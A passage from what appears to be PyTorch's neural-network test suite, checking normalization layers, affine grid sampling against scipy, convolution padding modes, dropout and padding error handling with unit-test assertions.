# in eval mode, adding X * std to a channel in input should make the
# corresponding channel in output have mean X
IN.eval()
delta = IN.running_var.sqrt() * torch.arange(c, device=device, dtype=dtype)
delta = delta.view(-1, *[1 for _ in range(2, input.dim())])
output = IN(input_var + delta)
self.assertEqual(output.transpose(0, 1).reshape(c, -1).mean(1), torch.arange(c, dtype=dtype))
def _test_InstanceNorm_cuda_half(self, cls, input, device):
# THNN
input = input.to(device=device, dtype=torch.half).random_(1, 10).requires_grad_(True)
m = cls(input.size(1), affine=True, track_running_stats=True).to(device, torch.half)
thnn_output = m(input)
thnn_output.sum().backward()
thnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(thnn_output, input)
# cuDNN
if TEST_CUDNN:
input.grad = None
m = m.float()
cudnn_output = m(input)
cudnn_output.sum().backward()
cudnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(cudnn_output, input)
self.assertEqual(cudnn_output, thnn_output, atol=1e-4, rtol=0)
self.assertEqual(cudnn_input_grad, thnn_input_grad, atol=1e-3, rtol=0)
def _test_LayerNorm_general(self, device, dtype=torch.float):
for i in range(2, 6):
shape = torch.randint(3, 6, (i,), dtype=torch.long).tolist()
x = torch.empty(*shape, device=device, dtype=dtype).uniform_(0, 10)
normalized_ndim = random.randint(1, i - 1) # inclusive
normalized_shape = shape[-normalized_ndim:]
unnormalized_shape = shape[:-normalized_ndim]
# test that LN normalizes to mean 0 and stddev 1
ln = nn.LayerNorm(normalized_shape, eps=0).to(device, dtype)
ln.weight.data.fill_(1)
ln.bias.data.fill_(0)
output = ln(x)
out_reshaped = output.view(*(unnormalized_shape + [-1]))
mean = out_reshaped.mean(-1)
var = out_reshaped.var(-1, unbiased=False)
delta = 1e-1 if dtype == torch.bfloat16 else 1e-5
self.assertEqual(torch.abs(mean.data).mean(), 0, atol=delta, rtol=0)
self.assertEqual(torch.abs(var.data).mean(), 1, atol=delta, rtol=0)
# test that LN applies weight and bias correctly
scale, bias = torch.empty(2).uniform_(0.2, 2).tolist()
ln.weight.data.fill_(scale)
ln.bias.data.fill_(bias)
output = ln(x)
out_reshaped = output.view(*(unnormalized_shape + [-1]))
mean = out_reshaped.mean(-1)
var = out_reshaped.var(-1, unbiased=False)
self.assertEqual(torch.abs(mean.data).mean(), bias, atol=delta, rtol=0)
self.assertEqual(torch.abs(var.data).mean(), scale ** 2, atol=delta, rtol=0)
bad_norm_shape_input_shape = {
(): (),
(2, 3): (3,),
(2,): (1, 2, 3),
(10,): (2, 3),
10: (2, 3),
}
for norm_shape, input_shape in bad_norm_shape_input_shape.items():
ln = nn.LayerNorm(norm_shape)
input = torch.empty(input_shape, device=device, dtype=dtype).uniform_(0, 10)
self.assertRaises(RuntimeError, lambda: ln(input))
def _test_LayerNorm_cuda_half(self, device):
input = torch.empty(2, 3, 3, 2, device=device, dtype=torch.half).random_(1, 10).requires_grad_(True)
m = nn.LayerNorm([3, 2]).to(device, torch.half)
output = m(input)
output.sum().backward()
self.assertEqualTypeString(output, input)
def _test_GroupNorm_general(self, device, dtype=torch.float):
good_shape_g = {
(1, 2, 3, 4): 2,
(2, 3, 10): 3,
(3, 1, 1, 1, 2): 1,
(2, 6, 4, 2, 2): 3,
(1, 256, 1, 1): 32,
}
for shape_g, grad in product(good_shape_g.items(), [True, False]):
shape, g = shape_g
x = torch.empty(*shape, device=device, dtype=dtype).uniform_(0, 10)
x.requires_grad_(grad)
b = shape[0]
c = shape[1]
# test that GN normalizes to mean 0 and stddev 1
gn = nn.GroupNorm(g, c, eps=0).to(device, dtype)
gn.weight.data.fill_(1)
gn.bias.data.fill_(0)
output = gn(x)
out_reshaped = output.view(b, g, -1)
mean = out_reshaped.mean(-1)
var = out_reshaped.var(-1, unbiased=False)
# TODO: fix numerical issue. See #44863
self.assertEqual(torch.abs(mean).mean(), 0, atol=1e-3, rtol=1e-3)
self.assertEqual(torch.abs(var).mean(), 1, atol=1e-3, rtol=1e-3)
output.backward(torch.randn_like(output))
if output.is_cuda:
torch.cuda.synchronize()
# test that GN applies weight and bias correctly
scale = torch.empty(c, device=device, dtype=dtype).uniform_(0.2, 2)
bias = torch.empty(c, device=device, dtype=dtype).uniform_(0.2, 2)
gn.weight.data.copy_(scale)
gn.bias.data.copy_(bias)
output = gn(x)
out_reshaped = output.view(b, c, -1)
out_normed = (out_reshaped - bias.view(c, 1)) / scale.view(c, 1)
out_normed_reshaped = out_normed.view(b, g, -1)
mean = out_normed_reshaped.mean(-1)
var = out_normed_reshaped.var(-1, unbiased=False)
# TODO: fix numerical issue. See #44863
self.assertEqual(torch.abs(mean).mean(), 0, atol=1e-3, rtol=1e-3)
self.assertEqual(torch.abs(var).mean(), 1, atol=1e-3, rtol=1e-3)
bad_shape_g = {
(1, 2, 3, 4): 3,
(2, 3, 10): 2,
(3, 1, 1, 1, 2): 10,
(2, 6, 4, 2, 2): 4,
}
for shape, g in bad_shape_g.items():
gn = nn.GroupNorm(g, shape[1])
input = torch.empty(*shape, device=device, dtype=dtype).uniform_(0, 10)
self.assertRaises(RuntimeError, lambda: gn(input))
def _test_GroupNorm_cuda_half(self):
input = torch.zeros(2, 4, 3, 2, requires_grad=True).cuda().half().random_(1, 10)
m = nn.GroupNorm(2, 4).to("cuda", torch.half)
output = m(input)
output.sum().backward()
self.assertEqualTypeString(output, input)
def _test_module_empty_input(self, module, inp, check_size=True):
inp.requires_grad_(True)
out = module(inp)
gO = torch.rand_like(out)
out.backward(gO)
if check_size:
self.assertEqual(out.size(), inp.size())
for p in module.parameters():
if p.requires_grad:
self.assertEqual(p.grad, torch.zeros_like(p.grad))
self.assertEqual(inp.grad, torch.zeros_like(inp))
def _test_module_empty_inputs(self, module, inputs):
for _inp in inputs:
_inp.requires_grad_(True)
out = module(*inputs)
gO = torch.rand_like(out)
out.backward(gO)
for p in module.parameters():
if p.requires_grad:
self.assertEqual(p.grad, torch.zeros_like(p.grad))
for _inp in inputs:
self.assertEqual(_inp.grad, torch.zeros_like(_inp))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off()
def test_affine_2d_rotate0(self, device):
# scipy before 1.0.0 do not support homogeneous coordinate
# scipy.ndimage.affine_transform, so we need to skip.
input_size = [1, 1, 3, 3]
input_ary = np.array(np.random.random(input_size), dtype=np.float32)
output_size = [1, 1, 5, 5]
angle_rad = 0.
transform_tensor, transform_ary, offset = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
offset=offset,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
self.assertEqual(scipy_ary.mean(), gridsample_ary.mean())
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.001)
def test_affine_2d_rotate90(self, device):
# scipy before 1.0.0 do not support homogeneous coordinate
# scipy.ndimage.affine_transform, so we need to skip.
for input_size2dsq, output_size2dsq in \
itertools.product(input_size2dsq_(), output_size2dsq_()):
input_size = input_size2dsq
input_ary = np.array(np.random.random(input_size), dtype=np.float32)
output_size = output_size2dsq
angle_rad = 0.25 * math.pi * 2
transform_tensor, transform_ary, offset = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
offset=offset,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=True))
if input_size2dsq == output_size2dsq:
self.assertEqual(scipy_ary.mean(), input_ary.mean())
self.assertEqual(scipy_ary[0, 0], input_ary[0, 0, 0, -1])
self.assertEqual(scipy_ary[0, -1], input_ary[0, 0, -1, -1])
self.assertEqual(scipy_ary[-1, -1], input_ary[0, 0, -1, 0])
self.assertEqual(scipy_ary[-1, 0], input_ary[0, 0, 0, 0])
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
self.assertEqual(scipy_ary.mean(), gridsample_ary.mean())
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.005)
def test_affine_2d_rotate45(self, device):
# scipy before 1.0.0 do not support homogeneous coordinate
# scipy.ndimage.affine_transform, so we need to skip.
input_size = [1, 1, 3, 3]
input_ary = np.array(np.zeros(input_size), dtype=np.float32)
input_ary[0, 0, 0, :] = 0.5
input_ary[0, 0, 2, 2] = 1.0
output_size = [1, 1, 3, 3]
angle_rad = 0.125 * math.pi * 2
transform_tensor, transform_ary, offset = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
offset=offset,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.005)
def test_affine_2d_rotateRandom(self, device):
# scipy before 1.0.0 do not support homogeneous coordinate
# scipy.ndimage.affine_transform, so we need to skip.
for angle_rad, input_size2d, output_size2d in \
itertools.product(angle_rad_(), input_size2d_(), output_size2d_()):
input_size = input_size2d
input_ary = np.array(np.random.random(input_size), dtype=np.float32).round(3)
output_size = output_size2d
input_ary[0, 0, 0, 0] = 2
input_ary[0, 0, 0, -1] = 4
input_ary[0, 0, -1, 0] = 6
input_ary[0, 0, -1, -1] = 8
transform_tensor, transform_ary, grid_ary = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
affine_tensor = affine_tensor.to('cpu')
for r in range(affine_tensor.size(1)):
for c in range(affine_tensor.size(2)):
grid_out = np.dot(grid_ary, [r, c, 1])
self.assertEqual(affine_tensor[0, r, c], grid_out[:2], exact_dtype=False)
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.005)
def test_affine_3d_rotateRandom(self, device):
# scipy before 1.0.0 do not support homogeneous coordinate
# scipy.ndimage.affine_transform, so we need to skip.
for angle_rad, axis_vector, input_size3d, output_size3d in \
itertools.product(angle_rad_(), axis_vector_(), input_size3d_(), output_size3d_()):
input_size = input_size3d
input_ary = np.array(np.random.random(input_size), dtype=np.float32)
output_size = output_size3d
input_ary[0, 0, 0, 0, 0] = 2
input_ary[0, 0, 0, 0, -1] = 3
input_ary[0, 0, 0, -1, 0] = 4
input_ary[0, 0, 0, -1, -1] = 5
input_ary[0, 0, -1, 0, 0] = 6
input_ary[0, 0, -1, 0, -1] = 7
input_ary[0, 0, -1, -1, 0] = 8
input_ary[0, 0, -1, -1, -1] = 9
transform_tensor, transform_ary, grid_ary = \
_buildEquivalentAffineTransforms3d(device, input_size, output_size, angle_rad, axis_vector)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
affine_tensor = affine_tensor.to('cpu')
for i in range(affine_tensor.size(1)):
for r in range(affine_tensor.size(2)):
for c in range(affine_tensor.size(3)):
grid_out = np.dot(grid_ary, [i, r, c, 1])
self.assertEqual(affine_tensor[0, i, r, c], grid_out[:3], exact_dtype=False)
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
def test_conv1d_same_padding(self, device):
# Test padding='same' outputs the correct shape
test_args = [
# in_size
range(50, 55),
# kernel_size
[1, 2, 3, 8],
# dilation
range(1, 4),
# stride
[1],
]
for in_size, k_size, dilation, stride in itertools.product(*test_args):
x = torch.rand(1, 1, in_size, device=device)
y = torch.rand(1, 1, k_size, device=device)
z = F.conv1d(x, y, padding='same', dilation=dilation, stride=stride)
self.assertEqual(z.size(2), int(math.ceil(in_size / stride)))
# Compare F.conv1d padding='same' output against manual padding
# Without strides/dilation
x = torch.rand(1, 1, 12, device=device)
y = torch.rand(1, 1, 3, device=device)
expect = F.conv1d(x, y, padding=1)
actual = F.conv1d(x, y, padding='same')
self.assertEqual(expect, actual)
# With dilation
x = torch.rand(1, 1, 12, device=device)
y = torch.rand(1, 1, 4, device=device)
expect = F.conv1d(x, y, padding=3, dilation=2)
actual = F.conv1d(x, y, padding='same', dilation=2)
self.assertEqual(expect, actual)
# Dilation with asymmetric padding
expect = F.conv1d(x, y, padding=5, dilation=3)[..., 1:]
actual = F.conv1d(x, y, padding='same', dilation=3)
self.assertEqual(expect, actual)
def test_conv2d_same_padding(self, device):
# Compare F.conv2d padding='same' output against manual padding
# Without strides/dilation
x = torch.rand(1, 1, 10, 11, device=device)
y = torch.rand(1, 1, 4, 5, device=device)
expect = F.conv2d(x, y, padding=(2, 2))[..., 1:, :]
actual = F.conv2d(x, y, padding='same')
self.assertEqual(expect, actual)
# With dilation
y = torch.rand(1, 1, 3, 4, device=device)
expect = F.conv2d(x, y, padding=(2, 3), dilation=2)
actual = F.conv2d(x, y, padding='same', dilation=2)
self.assertEqual(expect, actual)
# Dilation with asymmetric padding
y = torch.rand(1, 1, 4, 4, device=device)
expect = F.conv2d(x, y, padding=5, dilation=3)[..., 1:, 1:]
actual = F.conv2d(x, y, padding='same', dilation=3)
self.assertEqual(expect, actual)
def test_conv3d_same_padding(self, device):
# Compare F.conv3d padding='same' output against manual padding
# Without strides/dilation
x = torch.rand(1, 1, 10, 11, 12, device=device)
y = torch.rand(1, 1, 1, 2, 5, device=device)
expect = F.conv3d(x, y, padding=(0, 1, 2))[..., :, 1:, :]
actual = F.conv3d(x, y, padding='same')
self.assertEqual(expect, actual)
# With dilation
expect = F.conv3d(x, y, padding=(0, 1, 4), dilation=2)
actual = F.conv3d(x, y, padding='same', dilation=2)
self.assertEqual(expect, actual)
# Dilation with asymmetric padding
y = torch.rand(1, 1, 4, 4, 4, device=device)
expect = F.conv3d(x, y, padding=5, dilation=3)[..., 1:, 1:, 1:]
actual = F.conv3d(x, y, padding='same', dilation=3)
self.assertEqual(expect, actual)
def test_conv1d_valid_padding(self, device):
# Test F.conv1d padding='valid' is the same as no padding
x = torch.rand(1, 1, 10, device=device)
y = torch.rand(1, 1, 4, device=device)
expect = F.conv1d(x, y)
actual = F.conv1d(x, y, padding='valid')
self.assertEqual(expect, actual)
def test_conv2d_valid_padding(self, device):
# Test F.conv2d padding='valid' is the same as no padding
x = torch.rand(1, 1, 1, 10, device=device)
y = torch.rand(1, 1, 1, 4, device=device)
expect = F.conv2d(x, y)
actual = F.conv2d(x, y, padding='valid')
self.assertEqual(expect, actual)
def test_conv3d_valid_padding(self, device):
# Test F.conv3d padding='valid' is the same as no padding
x = torch.rand(1, 1, 1, 1, 10, device=device)
y = torch.rand(1, 1, 1, 1, 4, device=device)
expect = F.conv3d(x, y)
actual = F.conv3d(x, y, padding='valid')
self.assertEqual(expect, actual)
def test_conv1d_same_padding_backward(self, device):
# Test F.conv1d gradients work with padding='same'
x = torch.rand(1, 1, 12, device=device, requires_grad=True)
y = torch.rand(1, 1, 4, device=device, requires_grad=True)
# Symmetric padding
z = F.conv1d(x, y, padding=3, dilation=2)
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv1d(x, y, padding='same', dilation=2)
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
x.grad, y.grad = None, None
# Asymmetric padding
z = F.conv1d(x, y, padding=2)[..., 1:]
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv1d(x, y, padding='same')
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
def test_conv2d_same_padding_backward(self, device):
# Test F.conv2d gradients work with padding='same'
x = torch.rand(1, 1, 10, 11, device=device, requires_grad=True)
y = torch.rand(1, 1, 4, 5, device=device, requires_grad=True)
# Symmetric padding
z = F.conv2d(x, y, padding=(3, 4), dilation=2)
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv2d(x, y, padding='same', dilation=2)
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
x.grad, y.grad = None, None
# Asymmetric padding
y = torch.rand(1, 1, 4, 4, device=device, requires_grad=True)
z = F.conv2d(x, y, padding=2)[..., 1:, 1:]
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv1d(x, y, padding='same')
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
def test_conv3d_same_padding_backward(self, device):
# Test F.conv3d gradients work with padding='same'
x = torch.rand(1, 1, 1, 11, 12, device=device, requires_grad=True)
y = torch.rand(1, 1, 1, 2, 5, device=device, requires_grad=True)
# Symmetric padding
z = F.conv3d(x, y, padding=(0, 1, 4), dilation=2)
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv3d(x, y, padding='same', dilation=2)
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
x.grad, y.grad = None, None
# Asymmetric padding
y = torch.rand(1, 1, 1, 4, 4, device=device, requires_grad=True)
z = F.conv3d(x, y, padding=2)[..., 1:, 1:]
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv3d(x, y, padding='same')
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
def test_conv1d_valid_padding_backward(self, device):
# Test F.conv1d gradients work with padding='valid'
x = torch.rand(1, 1, 10, device=device, requires_grad=True)
y = torch.rand(1, 1, 4, device=device, requires_grad=True)
F.conv1d(x, y, padding=0).sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
F.conv1d(x, y, padding='valid').sum().backward()
gx_actual, gy_actual = x.grad, y.grad
self.assertEqual(gx_expect, gx_actual)
self.assertEqual(gy_expect, gy_actual)
def test_conv2d_valid_padding_backward(self, device):
# Test F.conv2d gradients work with padding='valid'
x = torch.rand(1, 1, 1, 10, device=device, requires_grad=True)
y = torch.rand(1, 1, 1, 4, device=device, requires_grad=True)
F.conv2d(x, y, padding=0).sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
F.conv2d(x, y, padding='valid').sum().backward()
gx_actual, gy_actual = x.grad, y.grad
self.assertEqual(gx_expect, gx_actual)
self.assertEqual(gy_expect, gy_actual)
def test_conv3d_valid_padding_backward(self, device):
# Test F.conv3d gradients work with padding='valid'
x = torch.rand(1, 1, 1, 1, 10, device=device, requires_grad=True)
y = torch.rand(1, 1, 1, 1, 4, device=device, requires_grad=True)
F.conv3d(x, y, padding=0).sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
F.conv3d(x, y, padding='valid').sum().backward()
gx_actual, gy_actual = x.grad, y.grad
self.assertEqual(gx_expect, gx_actual)
self.assertEqual(gy_expect, gy_actual)
def test_Dropout(self, device):
input = torch.empty(1000)
self._test_dropout(nn.Dropout, device, input)
self._test_dropout_discontiguous(nn.Dropout, device)
self._test_dropout_discontiguous(nn.Dropout, device, memory_format=torch.channels_last)
self._test_dropout_stride_mean_preserve(nn.Dropout, device)
if self.device_type == 'cuda' or self.device_type == 'cpu':
input = input.bfloat16()
self._test_dropout(nn.Dropout, device, input)
def test_Dropout2d(self, device):
b = random.randint(1, 5)
w = random.randint(1, 5)
h = random.randint(1, 5)
num_features = 1000
input = torch.empty(num_features, b, w, h)
self._test_dropout(nn.Dropout2d, device, input)
self._test_dropout(nn.Dropout2d, device, input, memory_format=torch.channels_last)
self._test_dropout_discontiguous(nn.Dropout2d, device)
self._test_dropout_discontiguous(nn.Dropout2d, device, memory_format=torch.channels_last)
# no batch dims
input = torch.empty(20, 64, 64)
self._test_dropout(nn.Dropout2d, device, input)
def test_Dropout3d(self, device):
b = random.randint(1, 5)
w = random.randint(1, 5)
h = random.randint(1, 5)
d = random.randint(1, 2)
num_features = 1000
input = torch.empty(num_features, b, d, w, h)
self._test_dropout(nn.Dropout3d, device, input)
self._test_dropout_discontiguous(nn.Dropout3d, device)
self._test_dropout_discontiguous(nn.Dropout3d, device, memory_format=torch.channels_last)
# no batch dims
input = torch.empty(50, 20, 64, 64)
self._test_dropout(nn.Dropout3d, device, input)
def test_InstanceNorm1d_general(self, device):
b = random.randint(3, 5)
c = random.randint(3, 5)
d = random.randint(8, 10)
input = torch.rand(b, c, d)
self._test_InstanceNorm_general(nn.InstanceNorm1d, input, device)
if self.device_type == 'cuda':
self._test_InstanceNorm_cuda_half(nn.InstanceNorm1d, input, device)
def test_InstanceNorm2d_general(self, device):
b = random.randint(3, 5)
c = random.randint(3, 5)
w = random.randint(3, 6)
h = random.randint(6, 8)
input = torch.rand(b, c, h, w)
self._test_InstanceNorm_general(nn.InstanceNorm2d, input, device)
if self.device_type == 'cuda':
self._test_InstanceNorm_cuda_half(nn.InstanceNorm2d, input, device)
def test_InstanceNorm3d_general(self, device):
b = random.randint(3, 5)
c = random.randint(3, 5)
w = random.randint(2, 5)
h = random.randint(2, 5)
d = random.randint(2, 5)
input = torch.rand(b, c, h, w, d)
self._test_InstanceNorm_general(nn.InstanceNorm3d, input, device)
if self.device_type == 'cuda':
self._test_InstanceNorm_cuda_half(nn.InstanceNorm3d, input, device)
def test_instancenorm_raises_error_if_less_than_one_value_per_channel(self, device):
x = torch.rand(10)[None, :, None]
with self.assertRaises(ValueError):
torch.nn.InstanceNorm1d(10)(x).to(device)
def test_instancenorm_raises_error_for_single_spatial_element_during_training(self, device):
BATCH_SIZE = 10
NUM_CHANNELS = 3
norms = [torch.nn.InstanceNorm1d, torch.nn.InstanceNorm2d, torch.nn.InstanceNorm3d]
for i, norm in enumerate(norms):
m = norm(NUM_CHANNELS, track_running_stats=True)
m.to(device)
# Create an appropriately-sized input with a single spatial element.
input = torch.randn(BATCH_SIZE, NUM_CHANNELS, *[1 for _ in range(i + 1)],
device=device)
with self.assertRaises(ValueError):
m(input)
# Single spatial element should be fine in eval.
m.eval()
m(input)
def test_LayerNorm_general(self, device):
self._test_LayerNorm_general(device)
if self.device_type == 'cuda' or self.device_type == 'cpu':
self._test_LayerNorm_general(device, dtype=torch.bfloat16)
if self.device_type == 'cuda':
self._test_LayerNorm_cuda_half(device)
@onlyOnCPUAndCUDA
def test_LayerNorm_numeric(self, device):
def layer_norm_ref(X, gamma, beta, normalized_shape, eps):
feature_size = np.prod(normalized_shape)
X_view = X.view(-1, feature_size)
mean = X_view.mean(dim=-1, keepdim=True)
var = X_view.var(dim=-1, unbiased=False, keepdim=True)
Y = (X_view - mean) / torch.sqrt(var + eps)
Y = Y * gamma.view(-1) + beta.view(-1)
return Y.view(*X.size())
normalized_shape = [256, 256, 144]
layer_norm = nn.LayerNorm(normalized_shape).float().to(device)
X = torch.rand(2, *normalized_shape, dtype=torch.float32,
device=device)
Y = layer_norm(X)
Y_ref = layer_norm_ref(X, layer_norm.weight.data, layer_norm.bias.data,
normalized_shape, layer_norm.eps)
self.assertEqual(Y, Y_ref, rtol=0, atol=1e-5)
if self.device_type == 'cuda':
layer_norm.cpu()
Y_cpu = layer_norm(X.cpu())
self.assertEqual(Y_cpu, Y, rtol=0, atol=1e-5)
@onlyOnCPUAndCUDA
def test_GroupNorm_general(self, device):
self._test_GroupNorm_general(device)
if self.device_type == 'cuda':
self._test_GroupNorm_cuda_half()
def test_GroupNorm_raises_error_if_one_value_per_group(self, device):
x = torch.rand(10)[None, :, None]
with self.assertRaises(ValueError):
torch.nn.GroupNorm(10, 10)(x).to(device)
def test_GroupNorm_empty(self, device):
mod = torch.nn.GroupNorm(2, 4).to(device)
inp = torch.randn(0, 4, 2, 2, device=device)
self._test_module_empty_input(mod, inp)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp)
@onlyCPU
@dtypes(torch.float, torch.double)
def test_groupnorm_nhwc(self, device, dtype):
def helper(self, size, groups):
channels = size[1]
input = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
input = input.contiguous(memory_format=torch.channels_last)
input.retain_grad()
grad = torch.randn(size, dtype=dtype, device=device)
grad = grad.contiguous(memory_format=torch.channels_last)
gn = nn.GroupNorm(groups, channels).to(device).to(dtype)
gn.weight.data.uniform_()
gn.bias.data.uniform_()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_gn = nn.GroupNorm(groups, channels).to(device).to(dtype)
ref_gn.load_state_dict(gn.state_dict())
out = gn(input)
out.backward(grad)
ref_out = ref_gn(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(gn.weight.grad, ref_gn.weight.grad)
self.assertEqual(gn.bias.grad, ref_gn.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
helper(self, (4, 8, 10, 10), 4)
helper(self, (2, 30, 9, 9), 3)
@onlyOnCPUAndCUDA
def test_GroupNorm_numeric(self, device):
def group_norm_ref(X, gamma, beta, groups, channels, eps):
batch_size = X.size()[0]
X_view = X.view(batch_size, groups, -1)
mean = X_view.mean(dim=-1, keepdim=True)
var = X_view.var(dim=-1, unbiased=False, keepdim=True)
Y = ((X_view - mean) / torch.sqrt(var + eps)).view(
batch_size, channels, -1)
Y = Y * gamma.view(channels, 1) + beta.view(channels, 1)
return Y.view(*X.size())
batch_size = 1
groups = 2
channels = 8
group_norm = nn.GroupNorm(groups, channels).float().to(device)
X = torch.rand(batch_size, channels, 256, 256, 72,
dtype=torch.float32, device=device)
Y = group_norm(X)
Y_ref = group_norm_ref(
X, group_norm.weight.data, group_norm.bias.data, groups,
channels, group_norm.eps)
self.assertEqual(Y, Y_ref, rtol=0, atol=1e-5)
if self.device_type == 'cuda':
group_norm.cpu()
Y_cpu = group_norm(X.cpu())
self.assertEqual(Y_cpu, Y, rtol=0, atol=1e-5)
@onlyOnCPUAndCUDA
@dtypes(torch.float64, torch.complex128)
def test_pad(self, device, dtype):
# Assert assertion errors are raised for invalid circular padding values
inputs = torch.randn(1, 1, 4, device=device, dtype=dtype, requires_grad=True)
# Should raise error when trying to wrap around more than once
self.assertRaises(AssertionError, lambda: F.pad(inputs, (5, 4), mode='circular'))
self.assertRaises(AssertionError, lambda: F.pad(inputs, (3, 6), mode='circular'))
# Should raise error when negative padding results in negative output shape
self.assertRaises(AssertionError, lambda: F.pad(inputs, (-3, -2), mode='circular'))
# assert that relfection padding errors when pad >= input size
expected_err_msg = r"Padding size should be less than the corresponding input dimension"
inputs = torch.randn(1, 1, 2, 3, device=device, dtype=dtype)
self.assertRaisesRegex(RuntimeError, expected_err_msg,
lambda: F.pad(inputs, (1, 1, 3, 0), mode='reflect'))
inputs = torch.randn(1, 1, 2, device=device, dtype=dtype)
self.assertRaisesRegex(RuntimeError, expected_err_msg,
lambda: F.pad(inputs, (2, 1), mode='reflect'))
inputs = torch.rand(1, 3, 4, 4, device=device, dtype=dtype)
# assert that pad doesn't return a view into the input tensor
for mode in 'constant', 'reflect', 'replicate', 'circular':
out = F.pad(inputs, (0, 0, 0, 0), mode=mode)
out.fill_(4)
self.assertTrue(torch.all(torch.abs(inputs) < 2))
out = F.pad(inputs, (0, 0, -1, -1), mode=mode)
out.fill_(4)
self.assertTrue(torch.all(torch.abs(inputs) < 2))
@onlyOnCPUAndCUDA
@dtypes(torch.float64, torch.complex128)
def test_ReplicationPad_empty(self, device, dtype):
for mod, inp in [
(torch.nn.ReplicationPad1d(3), torch.randn(0, 3, 10, device=device, dtype=dtype)),
(torch.nn.ReplicationPad2d(3), torch.randn(0, 3, 10, 10, device=device, dtype=dtype)),
